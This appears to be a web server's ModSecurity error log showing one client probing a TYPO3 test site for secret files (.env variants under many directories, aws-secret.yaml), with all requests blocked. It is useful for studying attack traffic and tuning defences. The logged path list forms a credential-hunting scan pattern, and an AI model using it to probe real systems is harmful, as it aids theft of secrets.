[Wed Dec 10 17:35:22.961225 2025] [:error] [pid 642265] [client 45.148.10.247:52198] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTmhSrP2BPelBlHY7gEfLQAAAAs"]
[Wed Dec 10 17:35:22.961522 2025] [:error] [pid 642265] [client 45.148.10.247:52198] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTmhSrP2BPelBlHY7gEfLQAAAAs"]
[Wed Dec 10 17:35:22.961744 2025] [:error] [pid 642265] [client 45.148.10.247:52198] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTmhSrP2BPelBlHY7gEfLQAAAAs"]
[Wed Dec 10 17:35:49.103786 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzrAAAAAE"]
[Wed Dec 10 17:35:49.104084 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzrAAAAAE"]
[Wed Dec 10 17:35:49.104273 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzrAAAAAE"]
[Wed Dec 10 17:35:49.143818 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzrQAAAAE"]
[Wed Dec 10 17:35:49.144073 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzrQAAAAE"]
[Wed Dec 10 17:35:49.144279 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzrQAAAAE"]
[Wed Dec 10 17:35:49.191289 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzrgAAAAE"]
[Wed Dec 10 17:35:49.191516 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzrgAAAAE"]
[Wed Dec 10 17:35:49.191699 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzrgAAAAE"]
[Wed Dec 10 17:35:49.215409 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzrwAAAAE"]
[Wed Dec 10 17:35:49.215656 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzrwAAAAE"]
[Wed Dec 10 17:35:49.215843 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzrwAAAAE"]
[Wed Dec 10 17:35:49.302150 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzsAAAAAE"]
[Wed Dec 10 17:35:49.302411 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzsAAAAAE"]
[Wed Dec 10 17:35:49.302596 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzsAAAAAE"]
[Wed Dec 10 17:35:49.358133 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzsQAAAAE"]
[Wed Dec 10 17:35:49.358424 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzsQAAAAE"]
[Wed Dec 10 17:35:49.358667 2025] [:error] [pid 636936] [client 45.148.10.247:37210] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aTmhZSj7S3f8o0DuYfxzsQAAAAE"]
[Wed Dec 10 17:35:53.172682 2025] [:error] [pid 636939] [client 45.148.10.247:37242] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTmhabCnovWtbeVvHnHXtQAAAAQ"]
[Wed Dec 10 17:35:53.172929 2025] [:error] [pid 636939] [client 45.148.10.247:37242] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTmhabCnovWtbeVvHnHXtQAAAAQ"]
[Wed Dec 10 17:35:53.173119 2025] [:error] [pid 636939] [client 45.148.10.247:37242] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTmhabCnovWtbeVvHnHXtQAAAAQ"]
[Wed Dec 10 17:36:06.381534 2025] [:error] [pid 642264] [client 45.148.10.247:37400] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTmhdpV8tnhi0nExSI5-KAAAAAo"]
[Wed Dec 10 17:36:06.381799 2025] [:error] [pid 642264] [client 45.148.10.247:37400] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTmhdpV8tnhi0nExSI5-KAAAAAo"]
[Wed Dec 10 17:36:06.381982 2025] [:error] [pid 642264] [client 45.148.10.247:37400] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTmhdpV8tnhi0nExSI5-KAAAAAo"]
[Wed Dec 10 17:36:11.675745 2025] [:error] [pid 636951] [client 45.148.10.247:58872] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTmhe9k209adLJ1hacVSqgAAAAU"]
[Wed Dec 10 17:36:11.675998 2025] [:error] [pid 636951] [client 45.148.10.247:58872] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTmhe9k209adLJ1hacVSqgAAAAU"]
[Wed Dec 10 17:36:11.676225 2025] [:error] [pid 636951] [client 45.148.10.247:58872] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aTmhe9k209adLJ1hacVSqgAAAAU"]
[Wed Dec 10 17:36:15.857537 2025] [:error] [pid 642265] [client 45.148.10.247:58878] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aTmhf7P2BPelBlHY7gEfLgAAAAs"]
[Wed Dec 10 17:36:15.857781 2025] [:error] [pid 642265] [client 45.148.10.247:58878] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aTmhf7P2BPelBlHY7gEfLgAAAAs"]
[Wed Dec 10 17:36:15.857970 2025] [:error] [pid 642265] [client 45.148.10.247:58878] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aTmhf7P2BPelBlHY7gEfLgAAAAs"]
[Wed Dec 10 17:36:15.894284 2025] [:error] [pid 642265] [client 45.148.10.247:58878] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aTmhf7P2BPelBlHY7gEfLwAAAAs"]
[Wed Dec 10 17:36:15.894714 2025] [:error] [pid 642265] [client 45.148.10.247:58878] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aTmhf7P2BPelBlHY7gEfLwAAAAs"]
[Wed Dec 10 17:36:15.894972 2025] [:error] [pid 642265] [client 45.148.10.247:58878] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aTmhf7P2BPelBlHY7gEfLwAAAAs"]
[Wed Dec 10 17:36:24.105149 2025] [authz_core:error] [pid 637203] [client 45.148.10.247:57240] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml
[Wed Dec 10 17:36:28.225713 2025] [:error] [pid 637203] [client 45.148.10.247:57240] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aTmhjDXuWi0ZC6S9l0nhbgAAAAg"]
[Wed Dec 10 17:36:28.225949 2025] [:error] [pid 637203] [client 45.148.10.247:57240] [client 45.148.10.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aTmhjDXuWi0ZC6S9l0nhbgAAAAg"]
[Wed Dec 10 17:36:28.226151 2025] [:error] [pid 637203] [client 45.148.10.247:57240] [client 45.148.10.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aTmhjDXuWi0ZC6S9l0nhbgAAAAg"]
[Wed Dec 10 17:36:30.646034 2025] [:error] [pid 642268] [client 45.148.10.247:47574] [client 45.148.10.247] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aTmhjijDeI-4sHVdKxOQwgAAAAw"]
